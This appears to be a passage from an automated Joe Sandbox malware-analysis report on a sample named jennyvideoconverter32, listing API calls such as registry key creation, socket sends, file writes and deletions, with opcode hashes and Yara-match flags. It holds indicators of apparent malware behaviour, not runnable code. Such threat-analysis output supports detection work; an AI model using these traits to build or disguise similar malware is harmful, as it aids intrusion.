                                                                            • Opcode ID: d42c8c2e09f0ade400b127a6f8a5a893b99a64b50af58aa63b6ce36b6dd82233
                                                                            • Instruction ID: 34acf4ffc5f27f61dd11ec1305511e0cacadf6b4b6d94de9565c5e33e50f063e
                                                                            • Opcode Fuzzy Hash: d42c8c2e09f0ade400b127a6f8a5a893b99a64b50af58aa63b6ce36b6dd82233
                                                                            • Instruction Fuzzy Hash: 4FD0A732348106DAD7008BE4AE4C7A977A8B74435AF318577D903F01C0E3F98049622E
                                                                            APIs
                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\SmallTour), ref: 0040B908
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID: Software\SmallTour
                                                                            • API String ID: 2289755597-3113880327
                                                                            • Opcode ID: e92014f5741c40466362d97be325f14a575943e2691ca884df845f09a2c42994
                                                                            • Instruction ID: b121c522d648ce6c13185118dedb7333930437af0ce722c4cbd77dbabdbc5d41
                                                                            • Opcode Fuzzy Hash: e92014f5741c40466362d97be325f14a575943e2691ca884df845f09a2c42994
                                                                            • Instruction Fuzzy Hash: 3FC048A029C14AEDE1600A219E9AF37208CDA04748B30003B3B1BB00D083785A22A0AF
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E24BF2
                                                                              • Part of subcall function 02E21BA7: __EH_prolog.LIBCMT ref: 02E21BAC
                                                                              • Part of subcall function 02E21BA7: RtlEnterCriticalSection.NTDLL ref: 02E21BBC
                                                                              • Part of subcall function 02E21BA7: RtlLeaveCriticalSection.NTDLL ref: 02E21BEA
                                                                              • Part of subcall function 02E21BA7: RtlEnterCriticalSection.NTDLL ref: 02E21C13
                                                                              • Part of subcall function 02E21BA7: RtlLeaveCriticalSection.NTDLL ref: 02E21C56
                                                                              • Part of subcall function 02E2E02B: __EH_prolog.LIBCMT ref: 02E2E030
                                                                              • Part of subcall function 02E2E02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02E2E0AF
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02E24CF2
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                            • String ID:
                                                                            • API String ID: 1927618982-0
                                                                            • Opcode ID: f57678042a8ce115b5cbc3291f581cf8e4559de7d52c9f661128bc0a7257ec1a
                                                                            • Instruction ID: 886cf651cd038be4da98609a24c50eb8439b13130065c5552715a76aa08aa74e
                                                                            • Opcode Fuzzy Hash: f57678042a8ce115b5cbc3291f581cf8e4559de7d52c9f661128bc0a7257ec1a
                                                                            • Instruction Fuzzy Hash: DA515AB1D44258DFDB15DFA8D484AEEBBB5FF09314F14905AE906AB341DB309A08CF60
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E22D47
                                                                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02E22D5C
                                                                              • Part of subcall function 02E2A43C: WSAGetLastError.WS2_32(00000000,?,?,02E22A51), ref: 02E2A44A
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$Send
                                                                            • String ID:
                                                                            • API String ID: 1282938840-0
                                                                            • Opcode ID: 3a802d672cfe86720985954435ccf755215ee9e30a9328e0ad27a817508374bb
                                                                            • Instruction ID: 14b87a46fdb195a73fc1adcf12da594a8eaa71bdebd968c3e5534e90ad208680
                                                                            • Opcode Fuzzy Hash: 3a802d672cfe86720985954435ccf755215ee9e30a9328e0ad27a817508374bb
                                                                            • Instruction Fuzzy Hash: F501D4B5480215EFDB205FA5D84486BBBFCFF45365B20952EFD9A83200DB708D44CBA1
                                                                            APIs
                                                                            • WSASetLastError.WS2_32(00000000), ref: 02E2833A
                                                                            • shutdown.WS2_32(?,00000002), ref: 02E28343
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastshutdown
                                                                            • String ID:
                                                                            • API String ID: 1920494066-0
                                                                            • Opcode ID: 22e6111a82df03ef534ce468eca2d32ffb01cf2289040b33675f6d68a7305509
                                                                            • Instruction ID: 99b7b7e0457066141c7c766b9f45d8ef59d10618a32b0a32b30d60b5e1dd7239
                                                                            • Opcode Fuzzy Hash: 22e6111a82df03ef534ce468eca2d32ffb01cf2289040b33675f6d68a7305509
                                                                            • Instruction Fuzzy Hash: B4F03A75A84324CFCB20AF68E504B5AB7E5BF09721F10981DEDAA97380D730A850CBA5
                                                                            APIs
                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DBF,00000000), ref: 00403A01
                                                                              • Part of subcall function 004038A8: GetVersionExA.KERNEL32 ref: 004038C7
                                                                            • HeapDestroy.KERNEL32 ref: 00403A40
                                                                              • Part of subcall function 00403DC7: HeapAlloc.KERNEL32(00000000,00000140,00403A29,000003F8), ref: 00403DD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                            • String ID:
                                                                            • API String ID: 2507506473-0
                                                                            • Opcode ID: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                            • Instruction ID: 5dadef9d12e489db140da5c14b34350ea54a5b880f3286d9e4ff1a1591b79aa3
                                                                            • Opcode Fuzzy Hash: 08f14aee262382775140a5fb38b16d88e88289f6ea168ffb6a246c9e47cbf934
                                                                            • Instruction Fuzzy Hash: 04F065707553016ADB24EF705E4676B3DD8AB80B53F10443BF541F41E0EB7C8690991A
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2511E
                                                                              • Part of subcall function 02E23D7E: htons.WS2_32(?), ref: 02E23DA2
                                                                              • Part of subcall function 02E23D7E: htonl.WS2_32(00000000), ref: 02E23DB9
                                                                              • Part of subcall function 02E23D7E: htonl.WS2_32(00000000), ref: 02E23DC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: htonl$H_prologhtons
                                                                            • String ID:
                                                                            • API String ID: 4039807196-0
                                                                            • Opcode ID: bb46581a244692fcd1746f94f00e8f6b2b28ce42f904d8bd740157dd946316dc
                                                                            • Instruction ID: 958ef365a2d3546f187277634e3ea60200495dc2d499d305e462b81dec919383
                                                                            • Opcode Fuzzy Hash: bb46581a244692fcd1746f94f00e8f6b2b28ce42f904d8bd740157dd946316dc
                                                                            • Instruction Fuzzy Hash: D9817972C4425E8ECF05DFA8D140AEEBBB5AF08314F10D06AD816B7240EB355A09CFB4
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E5A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e5a000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 651e8db60f01572729c0df409f274d532e130b34411ebb1b03bee4a596ac3184
                                                                            • Instruction ID: d3cb3e838f9dabbbba7b67541a6130d02f7c9d7d7acc699f645ddcb6a8f59965
                                                                            • Opcode Fuzzy Hash: 651e8db60f01572729c0df409f274d532e130b34411ebb1b03bee4a596ac3184
                                                                            • Instruction Fuzzy Hash: 834161F250C610AFE7156E19DC81BBABBE9EF98720F06492DEBC883740D63558408BD7
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E5A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e5a000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: f3ef28c9098564d07ae337382e149d342a29a769a9454d9c368cd47cc928549e
                                                                            • Instruction ID: 017d8aa626bf6edcead6922cd6a3188952f913b3599459efcf4afa66daa4c065
                                                                            • Opcode Fuzzy Hash: f3ef28c9098564d07ae337382e149d342a29a769a9454d9c368cd47cc928549e
                                                                            • Instruction Fuzzy Hash: 302165F264C600AFE305AF19ED457BEFBE9EF94720F16892EE2C5C2710D67448408A97
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2E8F9
                                                                              • Part of subcall function 02E21A01: TlsGetValue.KERNEL32 ref: 02E21A0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prologValue
                                                                            • String ID:
                                                                            • API String ID: 3700342317-0
                                                                            • Opcode ID: a254476f1f48e7cc08b73d221cb4b3a88902e4e0c0e244639437889e11402552
                                                                            • Instruction ID: fe56e5240f7da264d54f0c7eefbfeb0d1d768706d6f6d1ba285967b7b87e07dd
                                                                            • Opcode Fuzzy Hash: a254476f1f48e7cc08b73d221cb4b3a88902e4e0c0e244639437889e11402552
                                                                            • Instruction Fuzzy Hash: F22181B1D44229AFDB00DFA4D441AFEBBF9FF48314F14905EE509A7240D771A904CBA1
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(79E8203A), ref: 02E97B95
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E5A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e5a000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: a378112e45e988d36f5e7985dcf3bdcaa49003570e0f7dc8f81c3c4a85184e01
                                                                            • Instruction ID: db2096fe85fcbeb47f16b568c7ed5abd01cbf1f7c9751fdc5f84082814f2ff7a
                                                                            • Opcode Fuzzy Hash: a378112e45e988d36f5e7985dcf3bdcaa49003570e0f7dc8f81c3c4a85184e01
                                                                            • Instruction Fuzzy Hash: 9F1103F254C604ABE3157F09D8856BAFBE4EF54720F02492DD7C847640E63568948A97
                                                                            APIs
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02E233CC
                                                                              • Part of subcall function 02E232AB: __EH_prolog.LIBCMT ref: 02E232B0
                                                                              • Part of subcall function 02E232AB: RtlEnterCriticalSection.NTDLL(?), ref: 02E232C3
                                                                              • Part of subcall function 02E232AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02E232EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$CompareEnterExchangeH_prologInterlockedLeave
                                                                            • String ID:
                                                                            • API String ID: 1518410164-0
                                                                            • Opcode ID: 24eed85c8a52fc5d55cc926bd778c7871d202d5c376089a41cc5e33cc5c638c2
                                                                            • Instruction ID: 03935ca9a2fd07c3c7b193da16e6b9321651bb26d4728b14d8e0c265b08df163
                                                                            • Opcode Fuzzy Hash: 24eed85c8a52fc5d55cc926bd778c7871d202d5c376089a41cc5e33cc5c638c2
                                                                            • Instruction Fuzzy Hash: A2018071254616AFD708CF59D885F55BBA9FF44324B10C35AE829872C0EB70E925CFA0
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2E489
                                                                              • Part of subcall function 02E226DB: RtlEnterCriticalSection.NTDLL(?), ref: 02E22706
                                                                              • Part of subcall function 02E226DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02E2272B
                                                                              • Part of subcall function 02E226DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02E45A93), ref: 02E22738
                                                                              • Part of subcall function 02E226DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02E22778
                                                                              • Part of subcall function 02E226DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02E227D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4293676635-0
                                                                            • Opcode ID: 2f0644dabfd1d5f27908b8d7da35dd121b36d2032b52c8392007a79d0e88ccb9
                                                                            • Instruction ID: 35ddff20cdb3f7a2b46262d92134277c9fab26a77ed0332bd93465fab0f8a0df
                                                                            • Opcode Fuzzy Hash: 2f0644dabfd1d5f27908b8d7da35dd121b36d2032b52c8392007a79d0e88ccb9
                                                                            • Instruction Fuzzy Hash: 6E01DCB1950B148FC718CF0AD544986FBF4EF88304B05C5AE94498B721EBB0AA40CF90
                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02E2E268
                                                                              • Part of subcall function 02E33A8F: _malloc.LIBCMT ref: 02E33AA7
                                                                              • Part of subcall function 02E2E484: __EH_prolog.LIBCMT ref: 02E2E489
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$_malloc
                                                                            • String ID:
                                                                            • API String ID: 4254904621-0
                                                                            • Opcode ID: 3d06046e97c6f5be47cfa4997c5f9c33856638e4f87e5016a0a6360080a46d1a
                                                                            • Instruction ID: f6d5c96a93a8429680f07cc78300efafdc6fab8cb1264144d538bd32ab28a63e
                                                                            • Opcode Fuzzy Hash: 3d06046e97c6f5be47cfa4997c5f9c33856638e4f87e5016a0a6360080a46d1a
                                                                            • Instruction Fuzzy Hash: B8E0C271A80119ABCF0DDFA8E801B7D77A6EF04304F00D2ADB80AD6640DF709900CA90
                                                                            APIs
                                                                              • Part of subcall function 02E35B9A: __getptd_noexit.LIBCMT ref: 02E35B9B
                                                                              • Part of subcall function 02E35B9A: __amsg_exit.LIBCMT ref: 02E35BA8
                                                                              • Part of subcall function 02E333D6: __getptd_noexit.LIBCMT ref: 02E333DA
                                                                              • Part of subcall function 02E333D6: __freeptd.LIBCMT ref: 02E333F4
                                                                              • Part of subcall function 02E333D6: RtlExitUserThread.NTDLL(?,00000000,?,02E333B6,00000000), ref: 02E333FD
                                                                            • __XcptFilter.LIBCMT ref: 02E333C2
                                                                              • Part of subcall function 02E38CD4: __getptd_noexit.LIBCMT ref: 02E38CD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                            • String ID:
                                                                            • API String ID: 1405322794-0
                                                                            • Opcode ID: 16aafc43a5ba90929a14edece8ac8c849f72134aa8f165e5d193ad02afc34d4d
                                                                            • Instruction ID: 0ba70e72fedfe5937edae5493433c1dd06cec7f99bbd383bd37c6e9b00cb9bc9
                                                                            • Opcode Fuzzy Hash: 16aafc43a5ba90929a14edece8ac8c849f72134aa8f165e5d193ad02afc34d4d
                                                                            • Instruction Fuzzy Hash: B3E0E6B1985604DFEB05FBA0D909F6E77B5AF44303F109144F5019B260DA745D40DF21
                                                                            APIs
                                                                            • WriteFile.KERNELBASE(168B68CD), ref: 02E8D270
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E5A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E5A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e5a000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 9b4b94cab5542ff5c7cf18677c2c57fc57d1d2dde4b86324f7070652f1835810
                                                                            • Instruction ID: b532232b51f2329c8e53c4e60d6ef0d76b7ecb9542785c1b5852b63fcc7d47f3
                                                                            • Opcode Fuzzy Hash: 9b4b94cab5542ff5c7cf18677c2c57fc57d1d2dde4b86324f7070652f1835810
                                                                            • Instruction Fuzzy Hash: 2FD067F04CDA048BC3257F559C856B9FBE4AF51711F02585C82D946650E6745498CB86
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: ManagerOpen
                                                                            • String ID:
                                                                            • API String ID: 1889721586-0
                                                                            • Opcode ID: a14b483666c5fc9b8ff22ac58c0ab17ceceb2191c36a5213c526b5f02116a518
                                                                            • Instruction ID: 232d1456c01f78a6ba59260e61f8e62572dc572c9d60a38e8b06950da2094227
                                                                            • Opcode Fuzzy Hash: a14b483666c5fc9b8ff22ac58c0ab17ceceb2191c36a5213c526b5f02116a518
                                                                            • Instruction Fuzzy Hash: A2C08CA004C10AEEC2104E001BDC43A30AD91883083348837E603F2AE0C3BC0D03B87F
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CopyFile
                                                                            • String ID:
                                                                            • API String ID: 1304948518-0
                                                                            • Opcode ID: a97fd838a653de36010c31a52f7293aa102a31b9ebbdc3e1072805a91a9b159b
                                                                            • Instruction ID: c522f2358f225cf1c4a15b48037f0488db4b7f5a95cfe0defdb7541790945284
                                                                            • Opcode Fuzzy Hash: a97fd838a653de36010c31a52f7293aa102a31b9ebbdc3e1072805a91a9b159b
                                                                            • Instruction Fuzzy Hash: C2B0922028C206D6D1004A141B4DB362219C704741B380477292BB10D2CBBC4042319F
                                                                            APIs
                                                                            • RegQueryValueExA.KERNELBASE ref: 0040B51B
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: acf80bdad13ab1dcba0d3f112fef4d2f5fd76cef4d8293611f25947eef744e06
                                                                            • Instruction ID: e76b455b11ff224b55ac1dbe3b1499c0013a56c932f19d711532b2ebfa22ccaa
                                                                            • Opcode Fuzzy Hash: acf80bdad13ab1dcba0d3f112fef4d2f5fd76cef4d8293611f25947eef744e06
                                                                            • Instruction Fuzzy Hash: 51C02B3048D30086EB22CFB088041983A207890B047110CBE8003720C1C7744042A7CF
                                                                            APIs
                                                                            • CreateDirectoryA.KERNELBASE ref: 0040B12B
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory
                                                                            • String ID:
                                                                            • API String ID: 4241100979-0
                                                                            • Opcode ID: d86483f5c49182509ab129724d0fd15c8a56cfe47f65ff0aeaee7a482973cdab
                                                                            • Instruction ID: 05cdfdb419a29a078e1a5807cc2fddba59cfecf06acba27636b602faa0e0be10
                                                                            • Opcode Fuzzy Hash: d86483f5c49182509ab129724d0fd15c8a56cfe47f65ff0aeaee7a482973cdab
                                                                            • Instruction Fuzzy Hash: CEA022302CE028E3C000BB000E08E2A2E28E028302330C0333303B00C003BF20232BEF
                                                                            APIs
                                                                            • RegCloseKey.KERNELBASE(?), ref: 0040B84F
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: 54325de0c48bbed9867d0bfd2c8db3161bfbf60f7de79c28628eb2dfc7211496
                                                                            • Instruction ID: c47c1c762f42aee7be3bd5e3f96ee2e5193ba5f5b854ad9103954dc17480d21c
                                                                            • Opcode Fuzzy Hash: 54325de0c48bbed9867d0bfd2c8db3161bfbf60f7de79c28628eb2dfc7211496
                                                                            • Instruction Fuzzy Hash: 18B01231C58040D6C6001B808A05C1A3E70EA143003218073E313300E0833A60126A4F
                                                                            APIs
                                                                              • Part of subcall function 02E31550: OpenEventA.KERNEL32(00100002,00000000,00000000,83812041), ref: 02E315F0
                                                                              • Part of subcall function 02E31550: CloseHandle.KERNEL32(00000000), ref: 02E31605
                                                                              • Part of subcall function 02E31550: ResetEvent.KERNEL32(00000000,83812041), ref: 02E3160F
                                                                              • Part of subcall function 02E31550: CloseHandle.KERNEL32(00000000,83812041), ref: 02E31644
                                                                            • TlsSetValue.KERNEL32(0000002A,?), ref: 02E320EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2564886661.0000000002E21000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E21000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_2e21000_jennyvideoconverter32.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                            • String ID:
                                                                            • API String ID: 1556185888-0
                                                                            • Opcode ID: 75c31a65e31b5ce1d523b28aeeb70eebec03e13819218824b20534ab33aeb9da
                                                                            • Instruction ID: 8f44c542ec105eaaade1783e19864223e377af83132320aef149f400c23dac54
                                                                            • Opcode Fuzzy Hash: 75c31a65e31b5ce1d523b28aeeb70eebec03e13819218824b20534ab33aeb9da
                                                                            • Instruction Fuzzy Hash: E7018472A90214ABD710CF59DC09B5ABBE8EB05671F50866AF829D3380D7716910CA94
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040B684
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 579288e05d382d61efe3944d19b0733f96d4007ad5b87395da2ebddb59ab9ab5
                                                                            • Instruction ID: 6fade1d1ec90957231e49091bfb28855a4070128dd8e91ec00eaee17107283e7
                                                                            • Opcode Fuzzy Hash: 579288e05d382d61efe3944d19b0733f96d4007ad5b87395da2ebddb59ab9ab5
                                                                            • Instruction Fuzzy Hash: 28F0B471A00606AFD704DFA8D980AAA73A8FB04314F210126F616E71D0D739D94696AE
                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(00000000), ref: 0040BA29
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 8249ae698149d75f9e9d9fe1eea590c3b390e3fa07a05e8c3bd25844569859fa
                                                                            • Instruction ID: 875afba7be18bc28836bb96a55021a3113a20f3fe73b7cd2d283758a3c34a07d
                                                                            • Opcode Fuzzy Hash: 8249ae698149d75f9e9d9fe1eea590c3b390e3fa07a05e8c3bd25844569859fa
                                                                            • Instruction Fuzzy Hash: DDB01231644101EBC20007A04D047603650F708744F250932A903B12D0C338046AEAEF
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: f7b812978dd37915f31f8d7cc53c3a2cc7c1bee03418cd357c99bd42725f773e
                                                                            • Instruction ID: 49aa039f61561db0fc539dd536d612c9ed795406b6cbcd0371f8ad56698f4af9
                                                                            • Opcode Fuzzy Hash: f7b812978dd37915f31f8d7cc53c3a2cc7c1bee03418cd357c99bd42725f773e
                                                                            • Instruction Fuzzy Hash: 33B01230948500D7C20047606D04B203930F300300F100132A20B301E1C73614527B4F
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000008.00000002.2560511503.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000008.00000002.2560511503.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_8_2_400000_jennyvideoconverter32.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 1586166983-0
                                                                            • Opcode ID: d54b458d61a78df8872dc2bc0560f73c7a258f6717f6a9e085e1daf93bcced45
                                                                            • Instruction ID: a52736f1970860127354a3e5bc4c9e1c7fb76f912a72f56bd436bf7b8e465569
                                                                            • Opcode Fuzzy Hash: d54b458d61a78df8872dc2bc0560f73c7a258f6717f6a9e085e1daf93bcced45
